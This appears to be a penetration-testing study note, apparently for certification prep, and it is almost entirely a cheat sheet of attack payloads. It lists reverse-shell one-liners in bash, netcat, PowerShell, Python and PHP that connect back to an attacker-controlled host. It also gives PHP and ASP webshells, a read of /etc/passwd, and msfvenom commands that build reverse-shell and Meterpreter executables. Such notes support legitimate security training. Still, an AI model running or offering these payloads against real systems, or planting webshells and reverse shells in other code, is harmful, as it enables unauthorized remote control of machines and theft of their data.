6 - Shells & Payloads

# Basic Linux Revshells - NOTE: May need to URL encode when dealing with a webserver ```bash bash -c 'bash -i >& /dev/tcp/<kali_ip>/<port> 0>&1' rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc <kali_ip> <port> > /tmp/f #requires nc on target nc -e /bin/sh <kali_ip> <port> #requires nc on target ``` # Basic Powershell Revshell - NOTE: May need to URL and/or base64 encode when dealing with a webserver ```powershell powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<kali_ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" ``` # Python Revshell ```bash python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<kali_ip>",<post>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ``` # PHP Revshell ```php php -r '$sock=fsockopen("<kali_ip>",<port>);exec("/bin/sh -i <&3 >&3 2>&3");' <?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <kali_ip> <port> >/tmp/f"); ?> #requires nc on target ``` # PHP and ASP Webshells ```php <?php echo "Hello!";?> #simple test <?php system($_GET['cmd']); ?> #basic PHP webshell <?php system($_REQUEST['cmd']); ?> #REQUEST enables both GET and POST requests <?php system('whoami'); ?> #basic PHP command execution <?php file_get_contents('/etc/passwd'); ?> #basic PHP file read ``` ```asp <% eval request('cmd') %> #basic ASP webshell ``` # Other Web & Revshells - For webshells, can also use `laudanum` or `nishang/Antak` or `WhiteWinterWolf` - For WIN, use `nishang` payload such as `Invoke-PowerSHellTcp.ps1` ```bash ls -al /user/share/laudanum ``` ![[images/Pasted image 20260309182158.png]] ```bash ls -al /user/share/nishang ``` ![[images/Pasted image 20260309182349.png]] --- # Payloads ## Custom Revshell Payloads - Pair with listener: `sudo nc -lvnp <port>` - NOTE: Payload can be `reverse_https` or `shell_reverse_tcp` ```bash sudo msfvenom -p linux/reverse_https LHOST=<kali_ip> LPORT=<port> -f elf > shell.elf sudo msfvenom -p windows/shell_reverse_tcp LHOST=<kali_ip> LPORT=<port> -f exe > shell.exe ``` ## Meterpreter Payloads - Pair with `exploit/multi/handler` module in msf ```bash sudo msfvenom -p linux/meterpreter/shell_reverse_tcp LHOST=<kali_ip> LPORT=<port> -f elf > shell.elf sudo msfvenom -p windows/meterpreter/reverse_https LHOST=<kali_ip> LPORT=<port> -f exe -o shell.exe ``` ## DLL payload - After loading `msfconsole -q`, run `search windows/smb/smb_delivery` - For example usage, see [[5 - CPTS/3 - CPTS Notes/24 - Windows Privesc/29 - Windows Server|Windows Server]] ## C Payload - Minimal C payload that executes a payload when run - Compile into an `elf` with `gcc input.c -o file.out` ```c #include <stdio.h> #include <stdlib.h> int main(){ system("PAYLOAD HERE"); return 0; } ``` ## Python Payload ```bash python -c 'import pty; pty.spawn("/bin/sh")' ```